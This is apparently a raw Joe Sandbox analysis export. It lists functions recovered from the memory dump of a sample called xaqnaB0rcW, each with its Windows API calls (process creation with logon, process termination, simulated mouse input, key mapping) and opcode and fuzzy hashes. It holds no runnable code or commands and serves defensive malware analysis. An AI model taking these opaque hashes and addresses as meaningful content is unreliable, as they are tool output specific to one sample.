                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A8F6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_strlenselect
                                                                  • String ID:
                                                                  • API String ID: 2217125717-0
                                                                  • Opcode ID: 1796d382e060b0cd8dd8ea0ce2bbb01b9847d151516b1648fe1339c6c08fcb0a
                                                                  • Instruction ID: 12456159738d9e49123fa70d5715a73cc8656e0a1740b05dbc3f9370b51ffb51
                                                                  • Opcode Fuzzy Hash: 1796d382e060b0cd8dd8ea0ce2bbb01b9847d151516b1648fe1339c6c08fcb0a
                                                                  • Instruction Fuzzy Hash: 5741C371500204AFCB1AEF64DD85EAEB7BDEF09314F104659F5169B291DF30AE04CB60
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • BeginPaint.USER32(?,?,?), ref: 0036AC2A
                                                                  • GetWindowRect.USER32(?,?), ref: 0036AC8E
                                                                  • ScreenToClient.USER32(?,?), ref: 0036ACAB
                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036ACBC
                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 0036AD06
                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003CE673
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                  • String ID:
                                                                  • API String ID: 2592858361-0
                                                                  • Opcode ID: 13bb749cc2edc60860e22fac3d0cb677d930ec58c664b18236fba0fa898ca2cf
                                                                  • Instruction ID: 6a8863cd0f01e8669b4fe04fc17a2d011fffd164c91cc34bf957d4a439012396
                                                                  • Opcode Fuzzy Hash: 13bb749cc2edc60860e22fac3d0cb677d930ec58c664b18236fba0fa898ca2cf
                                                                  • Instruction Fuzzy Hash: E241AC71105701AFC712DF24DC84FAA7BACEB59320F148669FAA4DA2A5C731A844DF62
                                                                  APIs
                                                                  • ShowWindow.USER32(00411628,00000000,00411628,00000000,00000000,00411628,?,003CDC5D,00000000,?,00000000,00000000,00000000,?,003CDAD1,00000004), ref: 003BE40B
                                                                  • EnableWindow.USER32(00000000,00000000), ref: 003BE42F
                                                                  • ShowWindow.USER32(00411628,00000000), ref: 003BE48F
                                                                  • ShowWindow.USER32(00000000,00000004), ref: 003BE4A1
                                                                  • EnableWindow.USER32(00000000,00000001), ref: 003BE4C5
                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003BE4E8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 642888154-0
                                                                  • Opcode ID: fe7f396446544b628f15da4c8381cd977b0fee8b2d18689203a2c3b9a8724486
                                                                  • Instruction ID: a424c23811256d5adfca090d28497057b59fc937b0e54294c97d52d90ee8516e
                                                                  • Opcode Fuzzy Hash: fe7f396446544b628f15da4c8381cd977b0fee8b2d18689203a2c3b9a8724486
                                                                  • Instruction Fuzzy Hash: 46414C34601150EFDB23CF29D499BD47BF5BB09308F5981B9EA588FAA2C771E842CB51
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 003998D1
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00399908
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00399924
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0039999E
                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003999B3
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 003999D2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 2537439066-0
                                                                  • Opcode ID: a8c954e0af27c7bc7a193166701950eee675b5f2c4b51923db46374f1bbdb7f7
                                                                  • Instruction ID: 00a53c07ee8ad5280487c33281335240203397b32d7926a122d43f9ec7d8a637
                                                                  • Opcode Fuzzy Hash: a8c954e0af27c7bc7a193166701950eee675b5f2c4b51923db46374f1bbdb7f7
                                                                  • Instruction Fuzzy Hash: 81315231900105AFDF129F99DD85E6BB778FF45310F1480AAF905AB24AD770DE14DBA0
                                                                  APIs
                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,003A77F4,?,?,00000000,00000001), ref: 003A9B53
                                                                    • Part of subcall function 003A6544: GetWindowRect.USER32(?,?), ref: 003A6557
                                                                  • GetDesktopWindow.USER32 ref: 003A9B7D
                                                                  • GetWindowRect.USER32(00000000), ref: 003A9B84
                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003A9BB6
                                                                    • Part of subcall function 00397A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00397AD0
                                                                  • GetCursorPos.USER32(?), ref: 003A9BE2
                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003A9C44
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                  • String ID:
                                                                  • API String ID: 4137160315-0
                                                                  • Opcode ID: f8f81c3cb79ff079346b54409b04aaa0e794c34a226ca44a866bd86fdd0f0f38
                                                                  • Instruction ID: 0520664935d85e744f02024685fbd227a498b2d210c35dd8d79e7955fcbb8a02
                                                                  • Opcode Fuzzy Hash: f8f81c3cb79ff079346b54409b04aaa0e794c34a226ca44a866bd86fdd0f0f38
                                                                  • Instruction Fuzzy Hash: 3231CF72504309ABC711DF14EC49F9AB7EDFF8A314F000A1AF595E7181DA31EA08CBA2
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0038AFAE
                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0038AFB5
                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0038AFC4
                                                                  • CloseHandle.KERNEL32(00000004), ref: 0038AFCF
                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0038AFFE
                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 0038B012
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                  • String ID:
                                                                  • API String ID: 1413079979-0
                                                                  • Opcode ID: 406a377b07054aa1a09ecb00abe7a901da4130e7152f45b184ba9e8259d7bbd6
                                                                  • Instruction ID: 71731471647f99c843487db1bc200347d3dba7c194bfe503367a8758e6285d46
                                                                  • Opcode Fuzzy Hash: 406a377b07054aa1a09ecb00abe7a901da4130e7152f45b184ba9e8259d7bbd6
                                                                  • Instruction Fuzzy Hash: EB217CB2145309ABDB039FA4ED09BAE7BADAB44304F044096FA01A2161C3768D21EB61
                                                                  APIs
                                                                    • Part of subcall function 0036AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0036AFE3
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036AFF2
                                                                    • Part of subcall function 0036AF83: BeginPath.GDI32(?), ref: 0036B009
                                                                    • Part of subcall function 0036AF83: SelectObject.GDI32(?,00000000), ref: 0036B033
                                                                  • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003BEC20
                                                                  • LineTo.GDI32(00000000,00000003,?), ref: 003BEC34
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003BEC42
                                                                  • LineTo.GDI32(00000000,00000000,?), ref: 003BEC52
                                                                  • EndPath.GDI32(00000000), ref: 003BEC62
                                                                  • StrokePath.GDI32(00000000), ref: 003BEC72
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                  • String ID:
                                                                  • API String ID: 43455801-0
                                                                  • Opcode ID: 6bc8e48945c1ae33b80758e9decd55a2ba773df288a1b0c3bf9dba3929b98148
                                                                  • Instruction ID: 5aba16cee5c4a0065ff2f6e5812b3c0d70d73928da5de2bfc619f46b96d0ebd0
                                                                  • Opcode Fuzzy Hash: 6bc8e48945c1ae33b80758e9decd55a2ba773df288a1b0c3bf9dba3929b98148
                                                                  • Instruction Fuzzy Hash: 7711C572001149BFEB129FA4ED88EEA7F6DEB08354F048122FA199A160D7719D55DBA0
                                                                  APIs
                                                                  • GetDC.USER32(00000000), ref: 0038E1C0
                                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 0038E1D1
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0038E1D8
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0038E1E0
                                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0038E1F7
                                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 0038E209
                                                                    • Part of subcall function 00389AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00389A05,00000000,00000000,?,00389DDB), ref: 0038A53A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$ExceptionRaiseRelease
                                                                  • String ID:
                                                                  • API String ID: 603618608-0
                                                                  • Opcode ID: 4f695dcf8169e870c9b7e64fa6ee04edee16a18565360589a38150854bd13fc5
                                                                  • Instruction ID: e5be3b47e4cb3d7a979c79d778abae10613dcbf4a529cf34c0769c4a1e81a1a0
                                                                  • Opcode Fuzzy Hash: 4f695dcf8169e870c9b7e64fa6ee04edee16a18565360589a38150854bd13fc5
                                                                  • Instruction Fuzzy Hash: C6018FB5A40314BFEB11ABA6DC49B5EBFB8EB48351F004066EE04AB290D6709C00CBA0
                                                                  APIs
                                                                  • __init_pointers.LIBCMT ref: 00377B47
                                                                    • Part of subcall function 0037123A: __initp_misc_winsig.LIBCMT ref: 0037125E
                                                                    • Part of subcall function 0037123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00377F51
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00377F65
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00377F78
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00377F8B
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00377F9E
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00377FB1
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00377FC4
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00377FD7
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00377FEA
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00377FFD
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00378010
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00378023
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00378036
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00378049
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0037805C
                                                                    • Part of subcall function 0037123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0037806F
                                                                  • __mtinitlocks.LIBCMT ref: 00377B4C
                                                                    • Part of subcall function 00377E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0040AC68,00000FA0,?,?,00377B51,00375E77,00406C70,00000014), ref: 00377E41
                                                                  • __mtterm.LIBCMT ref: 00377B55
                                                                    • Part of subcall function 00377BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00377B5A,00375E77,00406C70,00000014), ref: 00377D3F
                                                                    • Part of subcall function 00377BBD: _free.LIBCMT ref: 00377D46
                                                                    • Part of subcall function 00377BBD: DeleteCriticalSection.KERNEL32(0040AC68,?,?,00377B5A,00375E77,00406C70,00000014), ref: 00377D68
                                                                  • __calloc_crt.LIBCMT ref: 00377B7A
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00377BA3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                  • String ID:
                                                                  • API String ID: 2942034483-0
                                                                  • Opcode ID: 8d816ba89eb9775be9d310aa13ad85d284f69d51f79b9cd4a04544a56e1dadc5
                                                                  • Instruction ID: 05e222fa5e1efea4de496eae5a6b73e6bdbafdeaf830e34b166ea21b61904c38
                                                                  • Opcode Fuzzy Hash: 8d816ba89eb9775be9d310aa13ad85d284f69d51f79b9cd4a04544a56e1dadc5
                                                                  • Instruction Fuzzy Hash: 55F0B43211D71219E67777347C0BA4B27C49F02730B21C6A9F86CDD1E2FF2C88614965
                                                                  APIs
                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0035281D
                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00352825
                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00352830
                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0035283B
                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00352843
                                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035284B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual
                                                                  • String ID:
                                                                  • API String ID: 4278518827-0
                                                                  • Opcode ID: 617d0649140179aece7bf31c97c0f2d16932e0a9f0ed11533a879f871a8ce229
                                                                  • Instruction ID: 3a57f869e2a4ede966e4a4b4d0533183eddac50b8421eab50eed57f0da7b9f88
                                                                  • Opcode Fuzzy Hash: 617d0649140179aece7bf31c97c0f2d16932e0a9f0ed11533a879f871a8ce229
                                                                  • Instruction Fuzzy Hash: 1D0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 1423608774-0
                                                                  • Opcode ID: 46cb0abb90cc9cde29d8e6ae956aff3288f5d5d63d56995d33bef362b1c195fb
                                                                  • Instruction ID: ff674d7b8fa12d41ecaec6fc44fe25069245c20a588158ce3f474cebfe3aacd1
                                                                  • Opcode Fuzzy Hash: 46cb0abb90cc9cde29d8e6ae956aff3288f5d5d63d56995d33bef362b1c195fb
                                                                  • Instruction Fuzzy Hash: 69018136542211ABDB171B6CFC88EEB776DFF88701B05082FF503960A0DB649800DB50
                                                                  APIs
                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00397C07
                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00397C1D
                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00397C2C
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C3B
                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C45
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00397C4C
                                                                  Similarity
                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 839392675-0
                                                                  • Opcode ID: 9d2996e39cac6497579d01b6e3ff1c06bf408cc371ca468204df428d6bf865c0
                                                                  • Instruction ID: 7406e119f1dd74e2a3edb926d23d1ec69ad9f40e0fc439e772683c8518b7fa92
                                                                  • Opcode Fuzzy Hash: 9d2996e39cac6497579d01b6e3ff1c06bf408cc371ca468204df428d6bf865c0
                                                                  • Instruction Fuzzy Hash: FAF05E76242158BBE7225B62AC0EEEF7F7CEFC6B11F40001AFA01D1091D7A05A41C6B5
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00399A33
                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A44
                                                                  • TerminateThread.KERNEL32(?,000001F6,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A51
                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A5E
                                                                    • Part of subcall function 003993D1: CloseHandle.KERNEL32(?,?,00399A6B,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 003993DB
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00399A71
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,003C5DEE,?,?,?,?,?,0035ED63), ref: 00399A78
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: be4818fd7a6193b831eae1ae8097ebc2b2cef148ab369bc7179eb80586b56e7a
                                                                  • Instruction ID: a98c247ad406eac35e401d753b08ab6bd63818400e75f0713d01a7c2ef581be8
                                                                  • Opcode Fuzzy Hash: be4818fd7a6193b831eae1ae8097ebc2b2cef148ab369bc7179eb80586b56e7a
                                                                  • Instruction Fuzzy Hash: E5F05E36582211ABD7131BA8FC89EAA772DFF85301F150827F503950A4DB759801DB50
                                                                  APIs
                                                                    • Part of subcall function 0036F4EA: std::exception::exception.LIBCMT ref: 0036F51E
                                                                    • Part of subcall function 0036F4EA: __CxxThrowException@8.LIBCMT ref: 0036F533
                                                                  • __swprintf.LIBCMT ref: 00351EA6
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00351D49
                                                                  Similarity
                                                                  • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                  • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                  • API String ID: 2125237772-557222456
                                                                  • Opcode ID: 363c762c9bf19314300d789d1abff073850c8b8d41945b4e32389aaa6c186d2c
                                                                  • Instruction ID: e0ae9a06f93d88186174ecd0cc166ae12b15cd6e211da287305fe55c87c4bc42
                                                                  • Opcode Fuzzy Hash: 363c762c9bf19314300d789d1abff073850c8b8d41945b4e32389aaa6c186d2c
                                                                  • Instruction Fuzzy Hash: 71917B715142019FC726EF25C896D6AB7B8AF85701F01491DFC899B2B1DB70EE08CB92
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(?), ref: 003AB006
                                                                  • CharUpperBuffW.USER32(?,?), ref: 003AB115
                                                                  • VariantClear.OLEAUT32(?), ref: 003AB298
                                                                    • Part of subcall function 00399DC5: VariantInit.OLEAUT32(00000000), ref: 00399E05
                                                                    • Part of subcall function 00399DC5: VariantCopy.OLEAUT32(?,?), ref: 00399E0E
                                                                    • Part of subcall function 00399DC5: VariantClear.OLEAUT32(?), ref: 00399E1A
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                  • API String ID: 4237274167-1221869570
                                                                  • Opcode ID: 376eb73791803745ec25de7b8674338b5e10fdc6fa255e5f3630ab314aa5fad0
                                                                  • Instruction ID: 18ed3b29d8a4454956cf77646fff2082f2681cb3e19f3b84dcb66816a547f4ba
                                                                  • Opcode Fuzzy Hash: 376eb73791803745ec25de7b8674338b5e10fdc6fa255e5f3630ab314aa5fad0
                                                                  • Instruction Fuzzy Hash: 1C917D306043019FCB11DF24C495A5ABBF8EF8A704F04486EF89A9B362DB31E949CB52
                                                                  APIs
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • _memset.LIBCMT ref: 00395438
                                                                  • GetMenuItemInfoW.USER32(?), ref: 00395467
                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00395513
                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0039553D
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                  • String ID: 0
                                                                  • API String ID: 4152858687-4108050209
                                                                  • Opcode ID: 1c2834845b3e578f290f7337d69ccb23b9e47fdde7818e3ad6ab7ec532bd4971
                                                                  • Instruction ID: b34d819ecb1abb11f539964b7351ee2559f107c9907ded6a5f5159bece801254
                                                                  • Opcode Fuzzy Hash: 1c2834845b3e578f290f7337d69ccb23b9e47fdde7818e3ad6ab7ec532bd4971
                                                                  • Instruction Fuzzy Hash: 365126711147019BDB579F28C881BBBB7E9AF46350F06052EF8A6D71E1D760CDC48752
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0039027B
                                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 003902B1
